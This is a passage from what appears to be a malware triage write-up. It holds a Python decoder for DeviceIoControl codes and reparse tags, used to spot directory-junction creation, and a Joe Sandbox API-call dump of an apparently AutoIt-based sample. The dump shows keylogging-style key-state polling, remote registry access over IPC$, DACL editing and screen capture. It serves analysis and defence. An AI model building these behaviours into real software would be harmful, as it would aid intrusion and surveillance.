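# (the object redirects to another path), bit 28 directory, bits 15..0 value.
REPARSE_TAGS = {
    0xA0000003: "IO_REPARSE_TAG_MOUNT_POINT",
    0xA000000C: "IO_REPARSE_TAG_SYMLINK",
}
CREATEFILE_FLAGS = {
    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
}
GENERIC_ACCESS = {
    0x80000000: "GENERIC_READ",
    0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE",
    0x10000000: "GENERIC_ALL",
}
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def decode_ctl_code(code: int) -> dict:
    """Split an I/O control code into its CTL_CODE fields and name it if known."""
    device = (code >> 16) & 0xFFFF
    function = (code >> 2) & 0xFFF
    return {
        "device_type": DEVICE_TYPES.get(device, hex(device)),
        "access": ACCESSES[(code >> 14) & 0x3],
        "function": function,
        "method": METHODS[code & 0x3],
        "name": FSCTL_NAMES.get((device, function), "unknown"),
    }


def decode_reparse_tag(tag: int) -> dict:
    """Break a reparse tag into its flag bits and 16-bit tag value."""
    return {
        "microsoft": bool(tag & 0x80000000),
        "name_surrogate": bool(tag & 0x20000000),
        "directory": bool(tag & 0x10000000),
        "value": tag & 0xFFFF,
        "name": REPARSE_TAGS.get(tag, "unknown"),
    }


def decode_flags(value: int, table: dict) -> list:
    """Name every set bit found in `table`, lowest bit first; leftover bits stay as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return names


def summarize_reparse_sequence(access, disposition, flags, ioctl, tag, target_fmt) -> list:
    """Render observed CreateFileW + DeviceIoControl arguments as triage notes."""
    ctl = decode_ctl_code(ioctl)
    rtag = decode_reparse_tag(tag)
    notes = [
        f"CreateFileW: {'|'.join(decode_flags(access, GENERIC_ACCESS))}, "
        f"{DISPOSITIONS.get(disposition, hex(disposition))}, "
        f"{'|'.join(decode_flags(flags, CREATEFILE_FLAGS))}",
        f"DeviceIoControl: {ctl['name']} (device {ctl['device_type']}, "
        f"function {ctl['function']}, {ctl['method']})",
        f"reparse tag: {rtag['name']} (value {rtag['value']}, "
        f"name surrogate={rtag['name_surrogate']})",
    ]
    # A mount point's substitute name must be an NT object path, which is
    # exactly what a "\??\%s" format string builds from a Win32 path.
    if rtag["name"] == "IO_REPARSE_TAG_MOUNT_POINT" and target_fmt.startswith("\\??\\"):
        notes.append("target written in NT namespace form: directory junction")
    return notes


if __name__ == "__main__":
    # Argument values as listed in the report for this function.
    for line in summarize_reparse_sequence(
        access=0x40000000, disposition=3, flags=0x02200000,
        ioctl=0x000900A4, tag=0xA0000003, target_fmt="\\??\\%s",
    ):
        print(line)
```

The same decoder applies to any other DeviceIoControl entry in the report: extend FSCTL_NAMES with the codes you care about, and unknown codes still come back with their device type, function number and method so they can be looked up in winioctl.h.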
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00CCBD04,?,?), ref: 00CCE564
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00CCBD04,?,?,00000000,?), ref: 00CCE57B
                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00CCBD04,?,?,00000000,?), ref: 00CCE586
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00CCBD04,?,?,00000000,?), ref: 00CCE593
                                • GlobalLock.KERNEL32(00000000), ref: 00CCE59C
                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00CCBD04,?,?,00000000,?), ref: 00CCE5AB
                                • GlobalUnlock.KERNEL32(00000000), ref: 00CCE5B4
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00CCBD04,?,?,00000000,?), ref: 00CCE5BB
                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00CCBD04,?,?,00000000,?), ref: 00CCE5CC
                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00CED9BC,?), ref: 00CCE5E5
                                • GlobalFree.KERNEL32(00000000), ref: 00CCE5F5
                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00CCE619
                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00CCE644
                                • DeleteObject.GDI32(00000000), ref: 00CCE66C
                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CCE682
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                • String ID:
                                • API String ID: 3840717409-0
                                • Opcode ID: 67a13ee4950c0064fffe6cbdd0b2f4ed709f66b8abb5a5334185c29a2115afd7
                                • Instruction ID: a26bcb3acc07cbe7e1f2700a1a55e2fb3f0bb92f8c9a36e8e74f39d974255510
                                • Opcode Fuzzy Hash: 67a13ee4950c0064fffe6cbdd0b2f4ed709f66b8abb5a5334185c29a2115afd7
                                • Instruction Fuzzy Hash: 86413C75600248EFDB119F65DC88FAEBBB9EF8A715F104058F916DB260D7319E01DB60
                                APIs
                                • __wsplitpath.LIBCMT ref: 00CB0C93
                                • _wcscat.LIBCMT ref: 00CB0CAB
                                • _wcscat.LIBCMT ref: 00CB0CBD
                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00CB0CD2
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CB0CE6
                                • GetFileAttributesW.KERNEL32(?), ref: 00CB0CFE
                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00CB0D18
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CB0D2A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                • String ID: *.*
                                • API String ID: 34673085-438819550
                                • Opcode ID: 06b005b54dfe154345ffb47d504248790eb6113f13c88ced58a23303d7406b26
                                • Instruction ID: 1880bc3d57eb346066787838808c17c61b450b7ab6a32a6bc5905c6ca39f77e0
                                • Opcode Fuzzy Hash: 06b005b54dfe154345ffb47d504248790eb6113f13c88ced58a23303d7406b26
                                • Instruction Fuzzy Hash: 708183715043059FC764DF64C885AEBB7E8BF88314F24892AF899C7251EB34EE85CB52
                                APIs
                                  • Part of subcall function 00C7AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00C7AF8E
                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CCED0C
                                • GetFocus.USER32 ref: 00CCED1C
                                • GetDlgCtrlID.USER32(00000000), ref: 00CCED27
                                • _memset.LIBCMT ref: 00CCEE52
                                • GetMenuItemInfoW.USER32 ref: 00CCEE7D
                                • GetMenuItemCount.USER32(00000000), ref: 00CCEE9D
                                • GetMenuItemID.USER32(?,00000000), ref: 00CCEEB0
                                • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00CCEEE4
                                • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00CCEF2C
                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CCEF64
                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00CCEF99
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                • String ID: 0
                                • API String ID: 1296962147-4108050209
                                • Opcode ID: 9059a056e8beda7a12c260df07eb4aec5febd5a3532deef7b80d9ad56123e5b8
                                • Instruction ID: d6029166f0c7ae41b9fed8827e8020eb4c16e50a14b6954cfb01380e518e4884
                                • Opcode Fuzzy Hash: 9059a056e8beda7a12c260df07eb4aec5febd5a3532deef7b80d9ad56123e5b8
                                • Instruction Fuzzy Hash: A9816971208311AFDB10DF54D884F6ABBE8FB8A354F00492DF9A997291D730DA05DBA2
                                APIs
                                  • Part of subcall function 00C9B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00C9B903
                                  • Part of subcall function 00C9B8E7: GetLastError.KERNEL32(?,00C9B3CB,?,?,?), ref: 00C9B90D
                                  • Part of subcall function 00C9B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00C9B3CB,?,?,?), ref: 00C9B91C
                                  • Part of subcall function 00C9B8E7: HeapAlloc.KERNEL32(00000000,?,00C9B3CB,?,?,?), ref: 00C9B923
                                  • Part of subcall function 00C9B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00C9B93A
                                  • Part of subcall function 00C9B982: GetProcessHeap.KERNEL32(00000008,00C9B3E1,00000000,00000000,?,00C9B3E1,?), ref: 00C9B98E
                                  • Part of subcall function 00C9B982: HeapAlloc.KERNEL32(00000000,?,00C9B3E1,?), ref: 00C9B995
                                  • Part of subcall function 00C9B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C9B3E1,?), ref: 00C9B9A6
                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C9B5F7
                                • _memset.LIBCMT ref: 00C9B60C
                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C9B62B
                                • GetLengthSid.ADVAPI32(?), ref: 00C9B63C
                                • GetAce.ADVAPI32(?,00000000,?), ref: 00C9B679
                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C9B695
                                • GetLengthSid.ADVAPI32(?), ref: 00C9B6B2
                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C9B6C1
                                • HeapAlloc.KERNEL32(00000000), ref: 00C9B6C8
                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C9B6E9
                                • CopySid.ADVAPI32(00000000), ref: 00C9B6F0
                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C9B721
                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C9B747
                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C9B75B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                • String ID:
                                • API String ID: 3996160137-0
                                APIs
                                • GetDC.USER32(00000000), ref: 00CBA2DD
                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00CBA2E9
                                • CreateCompatibleDC.GDI32(?), ref: 00CBA2F5
                                • SelectObject.GDI32(00000000,?), ref: 00CBA302
                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00CBA356
                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00CBA392
                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00CBA3B6
                                • SelectObject.GDI32(00000006,?), ref: 00CBA3BE
                                • DeleteObject.GDI32(?), ref: 00CBA3C7
                                • DeleteDC.GDI32(00000006), ref: 00CBA3CE
                                • ReleaseDC.USER32(00000000,?), ref: 00CBA3D9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                • String ID: (
                                • API String ID: 2598888154-3887548279
                                APIs
                                • LoadStringW.USER32(00000066,?,00000FFF), ref: 00CAD567
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • LoadStringW.USER32(?,?,00000FFF,?), ref: 00CAD589
                                • __swprintf.LIBCMT ref: 00CAD5DC
                                • _wprintf.LIBCMT ref: 00CAD68D
                                • _wprintf.LIBCMT ref: 00CAD6AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: LoadString_wprintf$__swprintf_memmove
                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                • API String ID: 2116804098-2391861430
                                APIs
                                • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00CAD37F
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00CAD3A0
                                • __swprintf.LIBCMT ref: 00CAD3F3
                                • _wprintf.LIBCMT ref: 00CAD499
                                • _wprintf.LIBCMT ref: 00CAD4B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: LoadString_wprintf$__swprintf_memmove
                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                • API String ID: 2116804098-3420473620
                                APIs
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                • _memset.LIBCMT ref: 00C9AF74
                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C9AFA9
                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C9AFC5
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C9AFE1
                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C9B00B
                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C9B033
                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C9B03E
                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C9B043
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                • API String ID: 1411258926-22481851
                                APIs
                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC2AA6,?,?), ref: 00CC3B0E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BuffCharUpper
                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                • API String ID: 3964851224-909552448
                                APIs
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00CA843F
                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00CA8455
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CA8466
                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00CA8478
                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00CA8489
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: SendString$_memmove
                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                • API String ID: 2279737902-1007645807
                                APIs
                                • timeGetTime.WINMM ref: 00CA809C
                                  • Part of subcall function 00C7E3A5: timeGetTime.WINMM(?,7608B400,00CD6163), ref: 00C7E3A9
                                • Sleep.KERNEL32(0000000A), ref: 00CA80C8
                                • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00CA80EC
                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00CA810E
                                • SetActiveWindow.USER32 ref: 00CA812D
                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CA813B
                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00CA815A
                                • Sleep.KERNEL32(000000FA), ref: 00CA8165
                                • IsWindow.USER32 ref: 00CA8171
                                • EndDialog.USER32(00000000), ref: 00CA8182
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                • String ID: BUTTON
                                • API String ID: 1194449130-3405671355
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00CD3C64,00000010,00000000,Bad directive syntax error,00CFDBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00CA32D1
                                • LoadStringW.USER32(00000000,?,00CD3C64,00000010), ref: 00CA32D8
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • _wprintf.LIBCMT ref: 00CA3309
                                • __swprintf.LIBCMT ref: 00CA332B
                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00CA3395
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                • API String ID: 1506413516-4153970271
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                • String ID: 0.0.0.0
                                • API String ID: 208665112-3771769585
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                • String ID:
                                • API String ID: 3566271842-0
                                APIs
                                • GetKeyboardState.USER32(?), ref: 00CA3908
                                • SetKeyboardState.USER32(?), ref: 00CA3973
                                • GetAsyncKeyState.USER32(000000A0), ref: 00CA3993
                                • GetKeyState.USER32(000000A0), ref: 00CA39AA
                                • GetAsyncKeyState.USER32(000000A1), ref: 00CA39D9
                                • GetKeyState.USER32(000000A1), ref: 00CA39EA
                                • GetAsyncKeyState.USER32(00000011), ref: 00CA3A16
                                • GetKeyState.USER32(00000011), ref: 00CA3A24
                                • GetAsyncKeyState.USER32(00000012), ref: 00CA3A4D
                                • GetKeyState.USER32(00000012), ref: 00CA3A5B
                                • GetAsyncKeyState.USER32(0000005B), ref: 00CA3A84
                                • GetKeyState.USER32(0000005B), ref: 00CA3A92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: State$Async$Keyboard
                                • String ID:
                                • API String ID: 541375521-0
                                APIs
                                • GetDlgItem.USER32(?,00000001), ref: 00C9FB19
                                • GetWindowRect.USER32(00000000,?), ref: 00C9FB2B
                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C9FB89
                                • GetDlgItem.USER32(?,00000002), ref: 00C9FB94
                                • GetWindowRect.USER32(00000000,?), ref: 00C9FBA6
                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C9FBFC
                                • GetDlgItem.USER32(?,000003E9), ref: 00C9FC0A
